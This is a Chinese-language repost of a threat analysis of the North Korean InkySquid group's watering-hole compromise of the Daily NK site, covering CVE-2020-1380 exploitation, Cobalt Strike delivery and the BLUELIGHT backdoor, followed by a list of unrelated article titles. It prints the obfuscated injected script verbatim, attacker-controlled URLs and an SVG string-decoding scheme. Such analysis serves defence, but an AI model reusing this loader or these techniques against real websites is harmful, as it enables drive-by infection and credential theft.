朝鲜InkySquid APT组织利用浏览器漏洞感染受害者。

2021年4月,Volexity研究人员识别出了通过www.dailynk[.]com网站加载到恶意子域名的jquery[.]services可疑代码。加载恶意代码的URL包括:

hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2

这些URL指向的是Daily NK网站使用的合法文件,但是内容被攻击者修改了,其中包含重定向用户从攻击者控制的域名jquery[.]services加载恶意JS。攻击者控制的代码只加入了很短的时间就被移除了,使得攻击者活动的识别变得非常困难。

CVE-2020-1380

Volexity研究人员发现攻击者利用的首个漏洞是CVE-2020-1380,一个IE 0 day漏洞利用。攻击者在Daily NK网站的下述合法文件中加入了一行代码:

hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1

加入到Daily NK网站的混淆的代码如下:

function vgrai(){var e=document.createElement("script");e.src=fecet("w6625I>>7x=y37t4;=5t48xrt5>4t52105x8t<t:6t0s=/x0=y5",15),document.head&&document.head.appendChild(e)}function vdgie(){const e=window.navigator.userAgent,t=e.indexOf("rv:11.0 "),i=e.indexOf("Trident/");return t>0||i>0}vdgie()&&vgrai();

加入以上代码后,如果用户用IE来访问Daily NK,页面就会从以下URL加载其他的JS文件:

hxxps://ui.jquery[.]services/responsive-extend.min.js

请求时,由于有正确的IE User-Agent,主机就会作为其他混淆的JS代码。初始重定向后,攻击者会选择将恶意代码隐藏在合法代码中。在本例中,攻击者使用了"bPopUp" JS库。这一选择具有2个结果:

◼分析JS的人可能会误认为其是合法的,因为大多数代码都是非恶意的;

◼识别恶意JS代码的自动化解决方案也可能会误认为这些代码是非恶意的,因为代码大部分可以与合法库内容匹配。

攻击者使用的漏洞利用代码中还包含许多混淆在变量中的字符串,以使其显得像合法的SVG内容。攻击者隐藏字符串的示例如图1所示:


图 1. SVG变量中混淆的字符串

为解密这些字符串,需要执行以下步骤:

◼通过M43.2字符串将path变量中的d属性中的数据分割开来;

◼将分割出的数据的每个元素通过空格符再次分割,会得到一个数字列表;

◼将这些数字转成整数;

◼如果整数大于30,就减去17,并加到生成的字符串中。如果整数小于等于30,就丢弃该数字。

总的来看,一共使用了3个假的SVG对象。一旦这些对象中的字符串替换为JS,识别漏洞利用就很容易了。解密和替换后的代码如图2所示:


图 2. CVE-2020-1380实现

代码对应的是TrendMicro研究人员发布的CVE-2020-1380漏洞PoC代码。

成功利用后,JS会使用相同的方法来解密最终的SVG变量,最终生成一个十六进制编码的Cobalt Strike stager,然后解码和执行。本例中,下载其他shellcode的URL包括:

◼hxxps://ui.jquery[.]services/swipeout.min.js

◼hxxps://ui.jquery[.]services/swipeout.min.css

◼hxxps://ui.jquery[.]services/slider.min.css

BLUELIGHT

在另一个样本中,攻击者使用jquery[.]services子域名来存放一个新的恶意软件家族。文件存放位置为:

hxxps://storage.jquery[.]services/log/history

history文件是一个XOR编码的定制恶意软件副本,恶意软件开发者和Volexity都将其命名为BLUELIGHT。命名依据是恶意软件PDB字符串:

E:\Development\BACKDOOR\ncov\Release\bluelight.pdb

BLUELIGHT是Cobalt Strike成功传播后的第二个payload。BLUELIGHT恶意软件使用不同的云服务提供商作为C2。恶意软件样本使用Microsoft Graph API进行C2操作。最开始的时候,BLUELIGHT使用硬编码的参数来进行oauth 2 token认证。客户端认证后,BLUELIGHT就会在OneDrive appfolder文件夹下创建子目录,创建的子目录名有:

logo

normal

background

theme

round

文件夹和子目录建立后,就会以JSON对象的格式来收集以下信息:

用户名

计算机名

操作系统版本

Web IP

默认接口的本地IP

本地时间

植入的二进制文件是32位还是64位

进程SID授权登记

进程文件名

安装的反病毒软件列表

受感染的机器是否运行虚拟机

这些数据会经过XOR编码为一个二进制blob并上传。所有上传的文件都会以.jpg作为扩展,不同的子目录和文件名表明不同类型的命令数据。

C2循环在初始上传侦查数据后开始,大约30秒循环一次。前5分钟内,每个循环会截图,并以时间戳作为文件名上传到normal子目录。5分钟后,截图每隔5分钟上传一次。

在每个循环中,客户端会通过美剧background子目录来查询新的命令。文件名表明要执行的命令,文件的内容提供命令相关的进一步信息。支持的命令包括:

执行和下载shellcode

下载和启动可执行文件,然后上传程序输出

获取IE、Edge、Chrome、Naver Whale等支持的浏览器中的cookie和密码数据库

递归检索路径和上传文件元数据;

产生一个进程来递归检索路径,以zip文件形式上传文件;

中止文件上传线程。

卸载。

命令文件在处理后会被删除,大多数命令生成的文件会上传到round目录。但zip upload会使用theme子目录。


最后,有在学网络安全的朋友需要资料的可以找我哦!!!

【安全漏洞】朝鲜InkySquid APT组织是怎么利用浏览器漏洞感染受害者相关推荐

  1. 恶意软件NOKKI和朝鲜“Group123”APT组织关联的最新证据

    Palo Alto Networks的研究人员近期发布了一篇关于NOKKI恶意软件的报告,报告表示NOKKI和新发现的KONNI恶意软件共用代码.尽管在此报告中没有说明,NOKKI还与KimJongR ...

  2. 怎样利用XSS漏洞在其它网站注入链接?

    怎样利用XSS漏洞在其它网站注入链接? 什么是XSS攻击 怎样利用XSS漏洞在别人网站注入链接 XSS攻击注入的链接有效果吗? 对搜索结果的潜在影响有多大? 作弊和黑帽SEO 黑帽SEO是相对于白帽而 ...

  3. [kali]--攻击浏览器漏洞

    攻击浏览器漏洞 Web浏览器时渲染和还原页面信息的应用程序,如果浏览器打开的页面含有触发漏洞的恶意代码,那么我们就有机会控制浏览器的下一步动作,执行payload. Aurora攻击 2010年,Au ...

  4. 朝鲜APT组织使用带后门IDA软件攻击安全研究人员

    2021年初,朝鲜APT组织Lazarus通过养推特大V账号,配合定制开发的恶意软件+0day漏洞针对安全研究人员进行了一系列的网络攻击活动,详细可见:通过社交媒体针对安全研究人员的社会工程学攻击活动 ...

  5. 朝鲜APT组织RedEye(Reaper)||ISIS持续进行 OpTheWorld行动

    一.朝鲜APT组织RedEye(Reaper/Group 123)新活动与总结 历史攻击事件与手段还有文档内容标题 历史样本家族与对应功能 Reloader (DocPrint) 在内存中执行其他恶意 ...

  6. 技术报告:APT组织Wekby利用DNS请求作为CC设施,攻击美国秘密机构

    技术报告:APT组织Wekby利用DNS请求作为C&C设施,攻击美国秘密机构 最近几周Paloalto Networks的研究人员注意到,APT组织Wekby对美国的部分秘密机构展开了一次攻击 ...

  7. 新型APT组织正在攻击全球的政府实体

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 ESET 公司称发现一个新型 APT 组织正在攻击全球范围内的实体,该组织被命名为 "FamousSparrow". 该 A ...

  8. APT组织最喜欢的工具 Cobalt Strike (CS) 实战

    一.Cobalt Strike 背景 Cobalt Strike 在威胁攻击者的恶意活动中的使用次数正在增加.从 2019 年到 2020 年,使用Cobalt Strike 的威胁攻击者增加了 16 ...

  9. 南亚Patchwork APT组织新活动特点分析

    知道创宇404实验室APT高级威胁情报团队,K &NaN 01 概述 Patchwork是自 2015 年 12 月以来一直活跃的南亚APT组织.该组织长期针对中国.巴基斯坦等南亚地区国家的政 ...

最新文章

  1. 部署通用基础设施, 满足顶级 SLA 要求
  2. 在ATS 5.3.0上开启stats_over_http插件
  3. 适合数据科学小白的必备Python工具! ! !
  4. 安卓中的单例模式和工厂模式
  5. 以太坊智能合约安全 Dasp Top10
  6. [置顶] NoSQl mongodb数据库 配置篇
  7. 【mongoDB运维篇③】replication set复制集
  8. 转:探索 AIX 6:在 AIX 6 上配置 iSCSI Target
  9. Android studio如何更改应用程序的图标以及名称
  10. 力扣459. 重复的子字符串(KMP,JavaScript)
  11. Hive窗口函数(over/partition by/order by/window/序列函数)总结与实践
  12. C语言实现2048小游戏
  13. 3.1 Zend_Db_Adapter
  14. Struts2通配符问题
  15. 烽火软件测试的笔试难不难,烽火科技笔试经验
  16. 硬件产品的成本构成——研发、产品边际成本和服务
  17. 华为交换机基于IP地址划分VLAN配置实验
  18. 【Unity3D】摇杆
  19. CODEVS 3977 炉石传说——圣骑士的逆袭
  20. 作为互联网人,这些潮流词汇你懂吗?

热门文章

  1. 成功解决NameError: name ‘norm‘ is not defined
  2. 成功解决ValueError: Shape of passed values is (33, 1), indices imply (33, 2)
  3. DL之DeconvNet:DeconvNet算法的简介(论文介绍)、架构详解、案例应用等配图集合之详细攻略
  4. ML之回归预测:机器学习中的各种Regression回归算法、关键步骤配图
  5. BigData:根据最新2018人工智能行业创新企业Top100名单,绘制AI行业VC最AI的热门领域(投资领域)
  6. BizTalk开发系列(三十一)配置和使用HTTP适配器
  7. 当今世界最受人们重视的十大经典算法
  8. Linux设置SSH登录(SecureCrt)
  9. Mongodb利用aggregation实现抽样查询(按记录数和时间)
  10. React的核心概念